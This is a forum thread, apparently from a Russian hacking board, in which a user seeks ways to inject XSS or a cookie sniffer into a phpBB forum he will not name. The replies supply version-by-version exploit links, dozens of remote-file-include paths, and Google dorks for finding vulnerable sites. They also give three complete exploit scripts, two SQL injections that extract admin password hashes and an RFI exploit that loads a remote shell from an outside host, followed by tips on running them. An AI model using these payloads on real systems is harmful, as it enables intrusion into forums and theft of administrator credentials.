Urgently need bugs for phpBB!

Одинокий Волк (banned)
Don't know which version; need an XSS at minimum, and I can't give the URL of the forum itself.
Nothing that's been posted on Antichat works, so it must be running the latest version, though it's not certain it wasn't fixed in an old one. There are no mods on the forum.
Avatars and uploading or inserting images in the signature are cut off... in short, there's nowhere even to plant a sniffer.... I need an XSS for posts or a way to put a sniffer in the signature.
 
Dunno, figure out the version yourself; here's a dump I had on my drive, no idea where it came from))
phpBB 2.0.4
Exploit: http://milw0rm.com/id.php?id=47

phpBB 2.0.5
Exploit: http://milw0rm.com/id.php?id=44

phpBB 2.0.6

Exploit: http://milw0rm.com/id.php?id=137

phpBB 2.0.10

Exploit: http://milw0rm.com/id.php?id=647

phpBB <= 2.0.13

Exploit: http://milw0rm.com/id.php?id=907

phpBB <= 2.0.15

Exploit: http://milw0rm.com/id.php?id=1080

Code:
viewtopic.php?t=1&highlight='.printf(md5(test)).'
phpBB <= 2.0.16
XSS:
" target="_blank">www.ut'
http://antichat.ru/sniff/log.php

phpBB <= 2.0.17

Exploit: http://rst.void.ru/download/r57phpbb2017.txt

phpBB <= 2.0.19

Exploit: http://www.milw0rm.com/exploits/1661

phpBB <= 2.0.20


Exploit: http://www.milw0rm.com/exploits/1780

phpBB <= 2.0.21

Exploit: http://www.milw0rm.com/exploits/2348

Added 17 minutes later
Mods

TopList Hack for PHPBB <= 1.3.8
Code:
/toplist.php?f=toplist_top10&phpbb_root_path=shell

Advanced GuestBook
Code:
/admin/addentry.php?phpbb_root_path=shell

Knowledge Base Mod
Code:
/includes/kb_constants.php?module_root_path=shell

phpBB auction mod
Code:
/auction/auction_common.php?phpbb_root_path=shell

phpRaid <= 3.0.b3
Code:
/[phpraidpath]/auth/auth.php?phpbb_root_path=shell
/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shell
/[phpraidpath]/auth/auth.php?smf_root_path=shell
/[phpraidpath]/auth/auth_SMF/smf_root_path=shell

PafileDB
Code:
/[pdbpath]/includes/pafiledb_constants.php?module_root_path=shell

Foing <= 0.7.0
Code:
/index.php?phpbb_root_path=shell
/song.php?phpbb_root_path=shell
/faq.php?phpbb_root_path=shell
/list.php?phpbb_root_path=shell
/gen_m3u.php?phpbb_root_path=shell
/playlist.php?phpbb_root_path=shell

Activity MOD Plus
Code:
/language/lang_english/lang_activity.php?phpbb_root_path=shell

Blend Portal <= 1.2.0
Code:
/blend_data/blend_common.php?phpbb_root_path=shell

Minerva <= 2.0.8a
Code:
/stat_modules/users_age/module.php?phpbb_root_path=shell

Minerva <= v238
Code:
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=shell

FlashBB <= 1.1.5
Code:
/phpbb/getmsg.php?phpbb_root_path=shell

HoRCMS <= 1.3.1
Code:
/includes/functions_cms.php?phpbb_root_path=shell

mail2forum <= 1.2
Code:
/m2f/m2f_forum.php?m2f_root_path=shell
/m2f/m2f_phpbb204.php?m2f_root_path=shell
/m2f/m2f_mailinglist.php?m2f_root_path=shell
/m2f/m2f_cron.php?m2f_root_path=shell

WoW Roster
Code:
/[roster_path]/lib/phpbb.php?subdir=shell

Integramod Portal
Code:
/includes/functions_mod_user.php?phpbb_root_path=shell
/includes/functions.php?phpbb_root_path=shell

Shadow Premod <= 2.7.1
Code:
/includes/functions_portal.php?phpbb_root_path=shell

phpBB XS <= 0.58
Code:
/includes/functions_kb.php?phpbb_root_path=shell
/includes/bbcb_mg.php?phpbb_root_path=shell
/includes/functions.php?phpbb_root_path=shell

pnphpbb
Code:
/includes/functions_admin.php?phpbb_root_path=shell

Admin Topic Action Logging
Code:
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=

phpBB Static Topics <= 1.0
Code:
/includes/functions_static_topics.php?phpbb_root_path=shell

Security Suite IP Logger
Code:
/includes/logger_engine.php?phpbb_root_path=shell

Dimension of phpBB
Code:
/includes/themen_portal_mitte.php?phpbb_root_path=shell
/includes/logger_engine.php?phpbb_root_path=shell
/includes/functions.php?phpbb_root_path=shell

phpBB User Viewed Posts Tracker
Code:
/includes/functions_user_viewed_posts.php?phpbb_root_path=shell

phpBB RANDOm USER REGISTRATION NUMBER
Code:
/includes/functions_num_image.php?phpbb_root_path=shell

phpBB insert user <= 0.1.2
Code:
/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Import Tools Mod <= 0.1.4
Code:
/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Ajax Shoutbox <= 0.0.5
Code:
/shoutbox.php?phpbb_root_path=shell

SpamBlockerMOD <= 1.0.2
Code:
/root/includes/antispam.php?phpbb_root_path=shell

phpBB PlusXL 2.x <= build 272
Code:
/mods/iai/includes/constants.php?phpbb_root_path=shell

AMAZONIA MOD
Code:
/zufallscodepart.php?phpbb_root_path=shell

news defilante horizontale <= 4.1.1
Code:
/français/root/includes/functions_newshr.php?phpbb_root_path=shell

phpBB lat2cyr <= 1.0.1
Code:
/lat2cyr.php?phpbb_root_path=shell

SpamOborona PHPBB Plugin
Code:
/admin/admin_spam.php?phpbb_root_path=shell

RPG Events 1.0.0
Code:
/functions_rpg_events.php?phpbb_root_path=shell

phpBB archive for search engines
Code:
/includes/archive/archive_topic.php?phpbb_root_path=shell

PhpBB Prillian French
Code:
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=shell

phpBB ACP User Registration Mod 1.00
Code:
/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Security <= 1.0.1
Code:
/phpbb_security.php?phpbb_root_path=shell

phpBBFM version 206-3-3
Code:
/language/lang_english/lang_prillian_faq.php?phpbb_root_path=shell

Fully Modded phpBB 2
Code:
/faq.php?foing_root_path=shell
/index.php?foing_root_path=shell
/list.php?foing_root_path=shell
/login.php?foing_root_path=shell
/playlist.php?foing_root_path=shell
/song.php?foing_root_path=shell
/view_artist.php?foing_root_path=shell
/view_song.php?foing_root_path=shell
/flash/set_na.php?foing_root_path=shell
/flash/initialise.php?foing_root_path=shell
/flash/get_song.php?foing_root_path=shell
/includes/common.php?foing_root_path=shell
/admin/nav.php?foing_root_path=shell
/admin/main.php?foing_root_path=shell
/admin/list_artists.php?foing_root_path=shell
/admin/index.php?foing_root_path=shell
/admin/genres.php?foing_root_path=shell
/admin/edit_artist.php?foing_root_path=shell
/admin/edit_album.php?foing_root_path=shell
/admin/config.php?foing_root_path=shell
/admin/admin_status.php?foing_root_path=shell


Dorks

Code:
Powered by phpBB 2

"Powered by phpBB"
Powered by phpBB

ext:php intext:"phpbb_installed"

"Powered by phpBB * 2002, 2006 phpBB Group" -demo

"2002, 2006 phpBB Group"
"phpBB Group"
phpbb 2

intext:"Powered by phpBB 2.0."

inurl:"index.php?sid="
inurl:"kb.php?mode=cat"
inurl:"templates" logo_phpBB.gif
inurl:/phpbb2/
inurl:/phpbb/

Code:
+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"
intext:"Powered by phpBB 2.0." inurl:"kb.php?mode=cat"

Code:
"Powered by phpBB" "2001, 2005 phpBB Group" inurl:index.php inurl:sid=
inurl:/install.php Welcome to phpBB
intext:"Powered by phpBB 2.0" -site:phpbb.com
intext:"Powered by phpBB 2.0" -site:phpbb.com -"2.0.11"
intitle:"Welcome.to.phpbb.*.installation"
filetype:php inurl:phpbb2 intext:Index -intext:2.0.13 -intext:2005
+intext:"* by phpBB ©"
"powered b" "y phpbb"
inurl:redirect=admin/index.php "Powered by phpBB"
inurl:admin/index.php "Powered" "phpBB"

Code:
"Powered by phpbb modified v1.8 by Przemo"
"Powered by" "v1.8 by Przemo"
"Powered by" "v1.8 by Przemo" -edu -demo -shoutbox
"Powered by" "v1.8 by Przemo" inurl:index.php -edu -demo -shoutbox
"powered by PhpBB 2.0.15" -site:phpbb.com
 
Rostov114, you just need to check milw0rm.com more often

phpBB 3 (memberlist.php) Remote SQL Injection Exploit

Code:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host:      target server (ip/hostname)\n";
echo "path:      path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo "   -T[prefix]   specify a table prefix different from default (phpbb_)\n";
echo "   -p[port]:    specify a port other than 80\n";
echo "   -P[ip:port]: specify a proxy\n";
echo "   -u[number]:  specify a user id other than 2 (admin)\n";
echo "   -x:          disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) { // read until headers complete (eregi() is gone from PHP 7)
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
  $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
  $discl=1;
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
 $temp2=explode(" ",$temp[$i]);
 $cookie.=" ".$temp2[0];
}
if (stripos($cookie,"_u=1;")!==false) // still the anonymous user id: login did not work
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
  }
  if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;}
  }
  if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
 if (preg_match('/^[a-f0-9]{32}/',trim($hash))) {return true;} // 32 hex chars = md5
 else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

# milw0rm.com [2006-07-13]

Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit

Code:
#!/usr/bin/perl
# © xoron
#
# [Name: phpBB Extreme 3.0.1 (phpbb_root_path) Remote File Include Exploit ]
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [Download: http://sourceforge.net/project/showfiles.php?group_id=95900 ]
#
# [Tesekkurler: pang0, DJR]
# 
# [POC: /includes/functions.php?phpbb_root_path=http://evilscripts?]
#
# [Vuln Codes: include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx ); ]
#
#
$rfi = "functions.php?phpbb_root_path="; 
$path = "/includes/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "&copy; xoron\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Ac?k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "© xoron.info - xoron.biz\n$thx: pang0, chaos, can bjorn\n";
sleep 3;
system("start $acacaz");
}

# milw0rm.com [2007-02-24]

phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit

Code:
#!/usr/bin/perl 
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit  
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102); 
my $http  = new LWP::UserAgent;

my $host  = shift;
my $table = shift;
my $myid  = shift or &usage;


sub injection
{
    my ($sub,$char) = @_;
    
    return "/tag_board.php?mode=controlpanel&action=delete&id=".
           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
           "ers+where+user_id=${myid})--";
}


sub usage
{
    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
    print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
    exit;
}


syswrite(STDOUT,'Hash MD5: ');

# 32 hex positions, 16 candidates each: the candidate that makes the
# reply take longer than 6 s (benchmark() ran) is the right byte
for my $i(1..32)
{
    my $found = 0;

    for my $j(0..15)
    {
        $time1 = time();

        $http->get($host.injection($i,$chars[$j]));

        $time2 = time();

        if($time2 - $time1 > 6)
        {
            syswrite(STDOUT,chr($chars[$j]));
            $hash .= chr($chars[$j]);
            $found = 1;
            last;
        }
    }

    # no candidate delayed the reply: wrong prefix/user id, or not vulnerable
    if(!$found)
    {
        syswrite(STDOUT,"\nExploit Failed!\n");
        exit;
    }
}

syswrite(STDOUT,"\n");

# milw0rm.com [2008-12-08]
 
Code:
#!/usr/bin/php -q -d short_open_tag=on
php
Code:
#!/usr/bin/perl
perl

to run:

X:\php\php.exe X:\sploit\sploit1.php -param sploit
if on Windows. Give the parameters the exploit should be run with.

perl is run the same way
 

